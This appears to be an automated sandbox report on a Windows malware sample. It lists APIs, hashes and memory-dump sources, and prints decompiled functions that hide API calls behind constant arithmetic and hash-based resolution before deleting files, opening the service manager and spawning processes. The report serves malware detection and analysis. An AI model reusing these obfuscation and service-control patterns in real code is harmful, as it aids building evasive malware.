0x6f188888
0x6f1887bd
0x6f188792
0x6f188795
0x6f188795
0x00000000
0x6f1886e0
0x6f188690
0x6f188690
0x6f188692
0x6f188692
0x6f188698
0x6f188699
0x6f18869a
0x6f18869f
0x6f1886a3
0x6f1886a6
0x6f1886b3
0x6f1886b5
0x6f1886b7
0x6f1886b9
0x6f1886be
0x6f1886c6
0x6f1886ca
0x6f1886ce
0x6f1886ce
0x6f1886d4
0x00000000
0x6f1886d4
0x6f18867e
0x6f188680
0x00000000
0x6f188680
0x6f187f90
0x6f187f88
0x6f187d47
0x6f187d4f
0x6f187d4f
0x6f187d52
0x6f187d57
0x6f187d5a
0x6f187d5b
0x6f187d5e
0x6f187d61
0x6f187d92
0x6f187d97
0x6f187d9a
0x6f187d9b
0x6f187d9e
0x6f187db9
0x6f187dbb
0x6f187dbd
0x6f187dc5
0x6f187dca
0x6f187dcb
0x6f187dcc
0x6f187dd1
0x6f187da0
0x6f187da5
0x6f187da5
0x6f187da9
0x6f187dae
0x6f187db2
0x6f187db2
0x6f187dd4
0x6f187ddc
0x6f187de4
0x6f187de9
0x6f187df0
0x6f187df0
0x6f187df6
0x6f187dfb
0x6f187e02
0x6f187e03
0x6f187e04
0x6f187e05
0x6f187e0a
0x6f187e0e
0x6f187e13
0x6f187e1d
0x6f187e22
0x6f187e25
0x6f187e29
0x6f187e2e
0x6f187e32
0x6f187e37
0x6f187e3b
0x6f187e41
0x6f187e47
0x6f187e48
0x6f187e48
0x6f187e48
0x6f187e4b
0x6f187e4e
0x6f187e52
0x6f187e55
0x6f187e59
0x6f187e5e
0x6f187e62
0x6f187e67
0x6f187e6a
0x6f187e6a
0x6f187e75
0x6f187e7d
0x00000000
0x6f187e7d
0x6f187d68
0x6f187d6b
0x6f187d71
0x6f187d74
0x6f187d76
0x6f187d8a
0x6f187d8a
0x00000000
0x00000000
0x00000000
0x00000000
0x6f187d78
0x6f187d78
0x6f187d78
0x6f187d7a
0x6f187d7d
0x6f187d7f
0x6f187d82
0x6f187d82
0x6f187d82
0x6f187d87
0x00000000
0x6f187e80
0x6f187e80
0x6f187e85
0x6f187e85
0x00000000
0x6f187d57
0x00000000
0x00000000
0x00000000
0x6f187bd8
0x6f187bd8
0x6f187bd8
0x6f187bd9
0x6f187bdb
0x6f187bdd
0x6f187be3
0x6f187be6
0x6f187be8
0x6f187be9
0x6f187bec
0x6f187bee
0x6f187bee
0x6f187bef
0x6f187bf2
0x6f187bf2
0x6f187bf5
0x6f187bf5
0x00000000
0x6f187bd8
0x6f1889fd
0x6f1889fd
0x6f1889fe
0x6f188a04
0x6f188a04

APIs

__aulldiv.LIBCMT ref: 6F186692
__aullrem.LIBCMT ref: 6F1866C6
GetTickCount64.KERNEL32 ref: 6F18676C
GetTickCount64.KERNEL32 ref: 6F186772
GetTickCount64.KERNEL32 ref: 6F1867A1
GetTickCount64.KERNEL32 ref: 6F1867A7
GetShellWindow.USER32 ref: 6F186927
GetOEMCP.KERNEL32 ref: 6F1869D2

Part of subcall function 6F185D90: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F185E04
Part of subcall function 6F185D90: SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 6F185E74
Part of subcall function 6F185D90: GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 6F185E93
Part of subcall function 6F185D90: GetACP.KERNEL32(00000000,?,?,?), ref: 6F185EA4

CoFreeUnusedLibraries.OLE32 ref: 6F186A30

Part of subcall function 6F185A30: GetOpenClipboardWindow.USER32(00000000,?,00000000,6F186431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 6F185A3C
Part of subcall function 6F185A30: CloseClipboard.USER32 ref: 6F185A73
Part of subcall function 6F185A30: GetMenuCheckMarkDimensions.USER32 ref: 6F185B30

Strings

?, xrefs: 6F18691B

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick$ClipboardWindow$Open$CheckCloseDimensionsFreeLibrariesMarkMenuShellSwitchThreadUnothrow_t@std@@@Unused__aulldiv__aullrem__ehfuncinfo$??2@
String ID: ?
API String ID: 1511855008-1684325040
Opcode ID: f8083b9250c1f3d6960bad3ca0f6e103964b6c0e580ea63c04044d86dbc3d28e
Instruction ID: 62b00dda1c1cf1a7ce9adcf4343f8ab844e4b9308ce32afe56a16c45b3ab14e0
Opcode Fuzzy Hash: f8083b9250c1f3d6960bad3ca0f6e103964b6c0e580ea63c04044d86dbc3d28e
Instruction Fuzzy Hash: 8313A931D10B5DCBCB12CF7AC99029DF7B1AF9A394F14839AE81977191EB3469A19F00

Uniqueness

Uniqueness Score: -1.00%

Function 0313F790, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0313F790(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				int _t48;
				signed int _t50;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E03142523(_t39);
				_v20 = 0x305f8e;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0x5f829bc1;
				_v12 = 0x22b27e;
				_v12 = _v12 >> 6;
				_v12 = _v12 + 0x22ee;
				_v12 = _v12 ^ 0x000c4601;
				_v8 = 0xcd41e2;
				_v8 = _v8 + 0xd868;
				_v8 = _v8 + 0xd31f;
				_t50 = 0x5f;
				_v8 = _v8 / _t50;
				_v8 = _v8 ^ 0x000a754c;
				_v16 = 0x592d24;
				_v16 = _v16 | 0x8ee4cdff;
				_v16 = _v16 ^ 0x8efaae11;
				E03122309(_t50 + 0x2c, _t50, _t50, 0x7c50bf37, _t50, 0x9c9047d0);
				_t48 = DeleteFileW(_a8); // executed
				return _t48;
			}

0x0313f796
0x0313f799
0x0313f79c
0x0313f7a1
0x0313f7a6
0x0313f7b0
0x0313f7b6
0x0313f7bd
0x0313f7c4
0x0313f7c8
0x0313f7cf
0x0313f7d6
0x0313f7dd
0x0313f7e4
0x0313f7f0
0x0313f7f8
0x0313f7fb
0x0313f802
0x0313f809
0x0313f810
0x0313f82e
0x0313f839
0x0313f83e

APIs

DeleteFileW.KERNEL32(8EFAAE11), ref: 0313F839

Strings

Lu, xrefs: 0313F7EB
$-Y, xrefs: 0313F802
Lu, xrefs: 0313F81A
", xrefs: 0313F7C8

Memory Dump Source

Source File: 00000003.00000002.457630299.0000000003120000.00000040.00000001.sdmp, Offset: 03120000, based on PE: true

Similarity

API ID: DeleteFile
String ID: $-Y$Lu$Lu$"
API String ID: 4033686569-1114282491
Opcode ID: 79e79a46e8f2bc5455ac9c56fc484e8236daa8409ea2d6f81888c9965c792b55
Instruction ID: 77bcac10a2c970618c5a256e5e1301c5082f6c1d691f7e53db744c7d67afe19a
Opcode Fuzzy Hash: 79e79a46e8f2bc5455ac9c56fc484e8236daa8409ea2d6f81888c9965c792b55
Instruction Fuzzy Hash: F211F5B6C00208FBDF09DFE4CC4A8AEBBB5FB54318F108588E915AA250D3B59B649F50

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AA3E2, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000000FF,6F1A6995,?,6F1A642D,6F1A9BBE,6F1A6995,?,6F1A731A,000000FF,000000FF), ref: 6F1AA3E7
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6F1A731A,000000FF,000000FF), ref: 6F1AA40D
_free.LIBCMT ref: 6F1AA44D
_free.LIBCMT ref: 6F1AA480
SetLastError.KERNEL32(00000000,000000FF), ref: 6F1AA48D

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: a0a47d7647a4e6f02a1109975c0ea92ffd9b20ce447618482965b76df4db31c5
Instruction ID: 32971fc557748bdc8c59b639efa6b13eff3c346945ce3efe6e220cd99fc50846
Opcode Fuzzy Hash: a0a47d7647a4e6f02a1109975c0ea92ffd9b20ce447618482965b76df4db31c5
Instruction Fuzzy Hash: 0911A93E144B00EAD7015A399C4CE6A3B69ABA27F47194319F438D61C4EB27E9319120

Uniqueness

Uniqueness Score: -1.00%

Function 0313B0E5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0313B0E5(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t54;

				E03142523(_t43);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x970fc6;
				_v28 = 0xf733cf;
				_v12 = 0x7d503f;
				_v12 = _v12 | 0x482efb7d;
				_v12 = _v12 + 0xffffad5b;
				_v12 = _v12 ^ 0x48710332;
				_v20 = 0x599c2f;
				_t54 = 0x26;
				_v20 = _v20 / _t54;
				_v20 = _v20 ^ 0x00074c3c;
				_v8 = 0x25764d;
				_v8 = _v8 + 0xffffd21e;
				_v8 = _v8 + 0x28dd;
				_v8 = _v8 ^ 0x00291a50;
				_v16 = 0x4f32db;
				_v16 = _v16 | 0x18cb750c;
				_v16 = _v16 ^ 0x18cb774b;
				_t51 = E03122309(0x234, _t54, _t54, 0x491df8aa, _t54, 0x9c9047d0);
				_t52 =  *_t51(_a16, 0, _a24, 0x28, __ecx, __edx, 0x28, _a8, 0, _a16, _a20, _a24); // executed
				return _t52;
			}

0x0313b0fd
0x0313b102
0x0313b109
0x0313b112
0x0313b119
0x0313b120
0x0313b127
0x0313b12e
0x0313b135
0x0313b141
0x0313b149
0x0313b14c
0x0313b153
0x0313b15a
0x0313b161
0x0313b168
0x0313b16f
0x0313b176
0x0313b17d
0x0313b19d
0x0313b1af
0x0313b1b4

APIs

SetFileInformationByHandle.KERNEL32(00000000,00000000,00970FC6,00000028), ref: 0313B1AF

Strings

?P}, xrefs: 0313B119
Mv%, xrefs: 0313B153

Memory Dump Source

Source File: 00000003.00000002.457630299.0000000003120000.00000040.00000001.sdmp, Offset: 03120000, based on PE: true

Similarity

API ID: FileHandleInformation
String ID: ?P}$Mv%
API String ID: 3935143524-2885159553
Opcode ID: 1ff294a8cd7c50f0204e083802874af947afed1ebbf66a27c509e70a6e85c5c2
Instruction ID: 53d1cfe6c74ea1e64e1dcdf8195f3c16446b1d4163e8269dec3d1590751ebafd
Opcode Fuzzy Hash: 1ff294a8cd7c50f0204e083802874af947afed1ebbf66a27c509e70a6e85c5c2
Instruction Fuzzy Hash: 342167B1D0120DFFDF54DF98CD4AAAEBBB1FB18305F008188E91566290D3B55B248F90

Uniqueness

Uniqueness Score: -1.00%

Function 031342E4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
memoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E031342E4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t43;
				char _t54;
				signed int _t57;
				void* _t62;
				void* _t63;

				_push(_a20);
				_t62 = __edx;
				_push(_a16);
				_t63 = __ecx;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E03142523(_t43);
				_v36 = 0xead706;
				_v32 = 0x8aaadf;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0x3b6f9b;
				_t57 = 0x3f;
				_v12 = _v12 * 0xe;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x1a7fe3f0;
				_v20 = 0x6318b1;
				_v20 = _v20 | 0x2b2fc1f2;
				_v20 = _v20 ^ 0x2b6f417a;
				_v8 = 0xeb56a2;
				_v8 = _v8 << 1;
				_v8 = _v8 / _t57;
				_v8 = _v8 * 0x2f;
				_v8 = _v8 ^ 0x015d5ff9;
				_v16 = 0x2619ef;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0x098e35d6;
				E03122309(_t57 + 0x4d, _t57, _t57, 0x52f9059f, _t57, 0x9c9047d0);
				_t54 = RtlFreeHeap(_t62, 0, _t63); // executed
				return _t54;
			}

0x031342ed
0x031342f2
0x031342f4
0x031342f7
0x031342f9
0x031342fa
0x031342fd
0x03134300
0x03134301
0x03134302
0x03134307
0x03134311
0x0313431a
0x0313431d
0x03134320
0x0313432d
0x03134334
0x03134337
0x0313433b
0x03134342
0x03134349
0x03134350
0x03134357
0x0313435e
0x0313436b
0x03134377
0x0313437a
0x03134381
0x03134388
0x0313438c
0x0313439f
0x031343aa
0x031343b2

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,072B1AC5,00000000,00000000), ref: 031343AA

Strings

zAo+, xrefs: 03134350

Memory Dump Source

Source File: 00000003.00000002.457630299.0000000003120000.00000040.00000001.sdmp, Offset: 03120000, based on PE: true

Similarity

API ID: FreeHeap
String ID: zAo+
API String ID: 3298025750-440923707
Opcode ID: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
Instruction ID: e306ef668a268aef785c69d8dcc2a0141afb7712aabeeee8756446e8b23f07e5
Opcode Fuzzy Hash: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
Instruction Fuzzy Hash: E92148B1C00218BF9B08DF99D98A8EEBFB8FB48344F508199E515AB240D3B05B149FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0313FE9D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E0313FE9D(void* __edx, intOrPtr _a4, intOrPtr _a8, int _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* __ecx;
				void* _t34;
				void* _t41;
				void* _t43;

				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				E03142523(_t34);
				_v32 = 0xfebeef;
				_v28 = 0x6b4d4f;
				_v24 = 0;
				_v20 = 0x72d4d3;
				_v20 = _v20 + 0x7ce2;
				_v20 = _v20 ^ 0x0072d8bc;
				_v16 = 0x618a6;
				_v16 = _v16 + 0x2ac;
				_v16 = _v16 ^ 0x00083b16;
				_v12 = 0x17740f;
				_v12 = _v12 + 0x9d82;
				_v12 = _v12 ^ 0x0012bdfc;
				_v8 = 0xba692b;
				_v8 = _v8 ^ 0x31422697;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0005552e;
				_push(0x21ce39be);
				_push(0xb53dc03);
				_push(_t42);
				_push(_t42);
				_t43 = 0x15;
				E03122309(_t43);
				_t41 = OpenSCManagerW(0, 0, _a16); // executed
				return _t41;
			}

0x0313fea4
0x0313fea9
0x0313feaa
0x0313fead
0x0313feb1
0x0313feb2
0x0313feb7
0x0313fec1
0x0313fec8
0x0313fecb
0x0313fed2
0x0313fed9
0x0313fee0
0x0313fee7
0x0313feee
0x0313fef5
0x0313fefc
0x0313ff03
0x0313ff0a
0x0313ff11
0x0313ff18
0x0313ff1c
0x0313ff2f
0x0313ff35
0x0313ff3a
0x0313ff3b
0x0313ff3e
0x0313ff3f
0x0313ff4c
0x0313ff52

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,03135191,?,?,?,?,?,?,?,?,?,?,0EB411AB), ref: 0313FF4C

Strings

OMk, xrefs: 0313FEC1

Memory Dump Source

Source File: 00000003.00000002.457630299.0000000003120000.00000040.00000001.sdmp, Offset: 03120000, based on PE: true

Similarity

API ID: ManagerOpen
String ID: OMk
API String ID: 1889721586-456170103
Opcode ID: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction ID: 463ad359d3b27e53281edb141cbb37eca17d8ee66e3631c4389aad6c4dffa1b5
Opcode Fuzzy Hash: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction Fuzzy Hash: 751128B1C0021CBBDB11EFA5D9098EFBFB4FF44318F108088E9146A201D3B55B159F91

Uniqueness

Uniqueness Score: -1.00%

Function 6F1967A5, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6F1967AC
std::locale::_Init.LIBCPMT ref: 6F1967CD

Part of subcall function 6F195FD3: __EH_prolog3.LIBCMT ref: 6F195FDA
Part of subcall function 6F195FD3: std::_Lockit::_Lockit.LIBCPMT ref: 6F195FE5
Part of subcall function 6F195FD3: std::locale::_Setgloballocale.LIBCPMT ref: 6F196000
Part of subcall function 6F195FD3: _Yarn.LIBCPMT ref: 6F196016
Part of subcall function 6F195FD3: std::_Lockit::~_Lockit.LIBCPMT ref: 6F196056

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: 8c2edf0f5c867f9ef45f41a8eb74a861b99ede4838b3cc206c465e70106c1fe8
Instruction ID: 784197da6469d0ab140506839f5ae6d154345cb534d99640fa3017486ce42056
Opcode Fuzzy Hash: 8c2edf0f5c867f9ef45f41a8eb74a861b99ede4838b3cc206c465e70106c1fe8
Instruction Fuzzy Hash: 06E0DF32A05722DBD3180BA8842035CA6806F91BE9F20011EE4106F6C0CFB2783043E0

Uniqueness

Uniqueness Score: -1.00%

Function 6F1A723C, Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6F1A7315

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 26e6df9df5ae82965efcc91d6272ccd720f7f606fa54f69ee7c185ef18ad15e2
Instruction ID: dc3b49c681649b5f32c51c58b0c427ac19599dff861d99eed992ffa73a6a173c
Opcode Fuzzy Hash: 26e6df9df5ae82965efcc91d6272ccd720f7f606fa54f69ee7c185ef18ad15e2
Instruction Fuzzy Hash: C6415E76A106148FCB14CF6DC48059DBBF1FF8D720B1682AAE924EB394D731AD518B91

Uniqueness

Uniqueness Score: -1.00%

Function 031431D2, Relevance: 1.6, APIs: 1, Instructions: 77processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 031432BB

Memory Dump Source

Source File: 00000003.00000002.457630299.0000000003120000.00000040.00000001.sdmp, Offset: 03120000, based on PE: true

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: d27a4405b7bfeb5d7fef50144d5ff88a6b5296ffa611ffbfdc7b6d3742468037
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: EF310576801248BBCF65DF96CD09CDFBFB5FB99704F108188F91466220D3B58A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0313199D, Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(D4FB5FE8,?,?,00000000,?,?,00000000), ref: 03131A79

Memory Dump Source

Source File: 00000003.00000002.457630299.0000000003120000.00000040.00000001.sdmp, Offset: 03120000, based on PE: true

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction ID: a8543689e569b63443bb73c56c1ac6a473069975a1f47018f145f284542b377b
Opcode Fuzzy Hash: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction Fuzzy Hash: 9621E27280021DBBDF05DF95D8098DEBFB6EF49354F108588F91466260D3B69A61AF90

Uniqueness

Uniqueness Score: -1.00%

Function 03122985, Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(F931A9E3,01AD2A76,65B9EDAF,?,?,?,?,?,?,?,?,00000000,229292B5), ref: 03122A3E

Memory Dump Source

Source File: 00000003.00000002.457630299.0000000003120000.00000040.00000001.sdmp, Offset: 03120000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction ID: 2e9e1d510f8dc1a9c14723939fb50d9921b28e93cea4011f776826d3371d80c4
Opcode Fuzzy Hash: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction Fuzzy Hash: 6B215372C00208BBDF18DFA8C80A8DEBFB5FB41710F108098E824A6210E3B4AB55DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0313A1D9, Relevance: 1.6, APIs: 1, Instructions: 57serviceCOMMON

Download Yara Rule

APIs

OpenServiceW.ADVAPI32(0016E205,00000000,00000000), ref: 0313A2A5

Memory Dump Source

Source File: 00000003.00000002.457630299.0000000003120000.00000040.00000001.sdmp, Offset: 03120000, based on PE: true

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 840192035c919cdef4810d782994658ce17bfcf84a61f68bdcf29756b0cc9f76
Instruction ID: 5098c3c46ed2accfba5a23458a3e84e56a12def0ac93b00c5ce94949a38f25b6
Opcode Fuzzy Hash: 840192035c919cdef4810d782994658ce17bfcf84a61f68bdcf29756b0cc9f76
Instruction Fuzzy Hash: 9B2128B1C0020DEFCF04DFA8C9459AEBBB5EB44300F108199E914A6260D7715B649F50

Uniqueness

Uniqueness Score: -1.00%

Function 03137708, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 031377B6

Memory Dump Source

Source File: 00000003.00000002.457630299.0000000003120000.00000040.00000001.sdmp, Offset: 03120000, based on PE: true

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction ID: 2e8c562ff0d205f36577afec34d9b1cae941ad051ffb718c82bea8b4a954692e
Opcode Fuzzy Hash: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction Fuzzy Hash: AD1137B6D00209BBDB18DFA4C9469EEBBB4FF44304F108589E814AB250D3B09B108F91

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B62EB, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 6F1ACCCD: RtlAllocateHeap.NTDLL(00000008,000000FF,00000000,?,6F1AA438,00000001,00000364,FFFFFFFF,000000FF,?,6F1A731A,000000FF,000000FF), ref: 6F1ACD0E

_free.LIBCMT ref: 6F1B6357

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: d9c6429dd4501ce64a3cc64a2ccc100fb0906da6c03e5f1f7bb6c00822cc60df
Instruction ID: 148633c33d6730f296c201a58619d199d51b10c66882a6ad0b0d5b6d9a78c41b
Opcode Fuzzy Hash: d9c6429dd4501ce64a3cc64a2ccc100fb0906da6c03e5f1f7bb6c00822cc60df
Instruction Fuzzy Hash: 11012B762043099BE3218E658840959FBE9EB963B0F25062DD194872C0E731B8558724

Uniqueness

Uniqueness Score: -1.00%

Function 03124248, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000), ref: 031242F1

Memory Dump Source

Source File: 00000003.00000002.457630299.0000000003120000.00000040.00000001.sdmp, Offset: 03120000, based on PE: true

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: fd91edb4b55a1cd66985db182b01cf41b131217ff4eff69998ae8d0f4e2bc21a
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: 4B1128B5E00208EBDB44DFE5D94AADEBBF1FB54308F208089E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0313A566, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(F8DAA7F9), ref: 0313A601

Memory Dump Source

Source File: 00000003.00000002.457630299.0000000003120000.00000040.00000001.sdmp, Offset: 03120000, based on PE: true

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction ID: 318c911d0cb68312ec016f1c27866dc39226705bdfaf6a2dcb6b1a2132fb0510
Opcode Fuzzy Hash: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction Fuzzy Hash: D511F7B5C1030DFBCB18DFA8D84699EBBB4EF44304F108598A855A6260D3756B558F91

Uniqueness

Uniqueness Score: -1.00%

Function 6F1ACCCD, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,000000FF,00000000,?,6F1AA438,00000001,00000364,FFFFFFFF,000000FF,?,6F1A731A,000000FF,000000FF), ref: 6F1ACD0E

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 54f9580658cbfd16b32d0f03430f7a4a577839c756bc6afcda0a9324e72a4a32
Instruction ID: 270e9247b61d719e49a696b62f00844d7f2141ce612d39d49697327a9ba692ce
Opcode Fuzzy Hash: 54f9580658cbfd16b32d0f03430f7a4a577839c756bc6afcda0a9324e72a4a32
Instruction Fuzzy Hash: BBF0B439704729A6EB114F2A8904A8A3B59AF937F4B114516EC29AA184CB72F43146E4

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B17FC, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 6F1A9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F198F9C,00000105,000000FF,24448D6F,00000000,?,6F181687,?,00000103,000000FF), ref: 6F1A9C04

_free.LIBCMT ref: 6F1B181C

Part of subcall function 6F1A9B98: HeapFree.KERNEL32(00000000,00000000,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BAE
Part of subcall function 6F1A9B98: GetLastError.KERNEL32(6F1A6995,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BC0

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
